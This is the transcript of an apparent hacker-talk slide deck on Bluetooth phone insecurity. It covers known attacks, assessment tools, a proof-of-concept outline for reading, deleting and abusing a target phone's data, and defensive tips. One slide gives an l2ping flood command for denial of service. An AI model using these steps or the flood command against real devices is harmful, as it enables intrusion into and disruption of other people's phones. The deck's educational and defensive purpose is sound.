bluetooth [in]security [2]
-
Upload
ammar-wk -
Category
Technology
-
view
958 -
download
2
Transcript of bluetooth [in]security [2]
“ 0wned a mobile phone via bluetooth “y3dipsy3dips
y3dipshttp://y3dips.echo.or.id
Who am I yet another “/Hacker “/ wannabe
founder of echo.or.id & Ubuntulinux.or.id
focusing in Hacking & Security since 2002
http://google.com/search?q=y3dips
y3dipshttp://y3dips.echo.or.id
Overview● Point of views● Proof 0f Concept● Survive● Discussion
y3dipshttp://y3dips.echo.or.id
Point 0f Views
y3dipshttp://y3dips.echo.or.id
History● The name Bluetooth is derived from the 10th century
king of Denmark, Harald Bluetooth.● Early 1998 - Special Interest Group formed
– Code name Bluetooth
– Promoter Companies: Ericsson*, IBM*, Intel*, Nokia*, and Toshiba*
● May 20, 1998 - Bluetooth publicly announced ● July 26, 1999 - Bluetooth 1.0 Specification Release ● Today - Bluetooth 2.0 work is ongoing-- bluetooth.com, wikipedia.org
y3dipshttp://y3dips.echo.or.id
Bluetooth ? (1) “Bluetooth wireless technology is a short-range
communications technology intended to replace the cables connecting portable and/or fixed devices while maintaining high levels of security. The key features of Bluetooth technology are robustness, low power, and low cost.” -- bluetooth.com
y3dipshttp://y3dips.echo.or.id
Bluetooth ? (2)● Wireless● Short-range communication● A Cable Replacement technology● Low power● Low cost● Hook together all the devices
y3dipshttp://y3dips.echo.or.id
Technical Details● 2.4 GHz ISM Open Band
– Globally free available frequency– 79 MHz of spectrum = 79 channels– Frequency Hopping & Time Division Duplex
(1600 hops/second)● 10-100 Meter Range
– Class I 100 meter (300 feet)–– Class II 20 meter (60 feet)–– Class III 10 meter (30 feet)–
● uses 2.5 mW of power● 1 Mbps Gross Rate● Simultaneous Voice/Data Capable
y3dipshttp://y3dips.echo.or.id
Core protocol
y3dipshttp://y3dips.echo.or.id
Around Us (1)
y3dipshttp://y3dips.echo.or.id
Around Us (2)
y3dipshttp://y3dips.echo.or.id
Bluetooth mode● On
– disoverable – un-discoverable
● Automatic● Off
y3dipshttp://y3dips.echo.or.id
Security Mode● Security Mode 1: non-secure● Security Mode 2: service level enforced security● Security Mode 3: link level enforced security
y3dipshttp://y3dips.echo.or.id
Known Threat● bluejacking -- “send unsoliticed message”
● bluesmack -- “u may call it denial of service the device”
● bluesnarfing -- “read phonebook, read a message, knowing the info”
● bluebug -- “execute an AT command, full access (write/read)”
● backdoor attack -- “unused pairing attack”
Bluetooth Pairing happens when two Bluetooth enabled devices agree to communicate with one another. When this happens, the two devices join what is called a trusted pair. When one device recognizes another device in an established trusted pair, each device automatically accepts communication, bypassing the discovery and authentication process that normally happen during Bluetooth interactions.
y3dipshttp://y3dips.echo.or.id
Do We Vulnerable ?
y3dipshttp://y3dips.echo.or.id
Do We Vulnerable ?
-- thebunker.net
y3dipshttp://y3dips.echo.or.id
Proof Of Concept
o\/\/n3d
y3dipshttp://y3dips.echo.or.id
Preparation (0)● Oh my .. we need some basic at least
– first of all, sorry im doing it in linux so go get some linux distribution.
– having a bluetooth device – installing bluez at bluez.org (dont worry some of new
kernel already include it for you )– read the rest of this paper .... :p
y3dipshttp://y3dips.echo.or.id
Preparation (1)● Knowing your device
y3dipshttp://y3dips.echo.or.id
Preparation (2)● Knowing your device
y3dipshttp://y3dips.echo.or.id
Preparation (3)● Define the pin for pairing/backdoor attack
● Waiting incoming for address
y3dipshttp://y3dips.echo.or.id
Preparation (4)● have your own armory
– default ( hcitool, sdptool )– bluesnarfer– bluescanner– bluediving– bt_audit– redfang– btxml--- http://google.com/search?q=bluetooth+assessment+tools
y3dipshttp://y3dips.echo.or.id
0wned (0)● reading a device info
y3dipshttp://y3dips.echo.or.id
0wned (1)● Reading a “private” data
y3dipshttp://y3dips.echo.or.id
0wned (2)● Deleting “private” data
y3dipshttp://y3dips.echo.or.id
0wned (3)● Executing some “AT”commands (eg. make a phone call)
y3dipshttp://y3dips.echo.or.id
0wned (4)● Denial of service the target
set data size to a bigger size to doin some DOS attack ( using l2ping -s Big-data-size -b Address )
y3dipshttp://y3dips.echo.or.id
Next 0wned (0)● Detecting & footprint the target
y3dipshttp://y3dips.echo.or.id
Next 0wned (1)● Target as an internet gateway (backdoor attack)
-- finding a DUN (dial up networking support) using sdptool
y3dipshttp://y3dips.echo.or.id
Next 0wned (2)● Target as an internet gateway (backdoor attack)
-- Binding an address connecting process using pppd
y3dipshttp://y3dips.echo.or.id
Next 0wned (3)● Range arent a real problem
– “ bluesniper” rifle which is developed by John Hering and his colleagues from Flexilis able to capture all bluetooth device in a mile.
-- http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/
y3dipshttp://y3dips.echo.or.id
Next 0wned (4)● No need a Non-mobile device
“ blueoover” is a proof-of-concept tool that is intended to run on J2ME-enabled cell phones that appear to be comparably seamless.
Until now, in the past, attackers need laptops for the snarfing of other people's information
-- http://trifinite.org/trifinite_stuff_blooover.html
y3dipshttp://y3dips.echo.or.id
Survive● turn off the service ● make your device into a non-discoverable state● update a firmware● using a strong pin for pairing● unpair unused device● using antivirus (updated) and firewall ● reject unknown message and connection
y3dipshttp://y3dips.echo.or.id
Discussion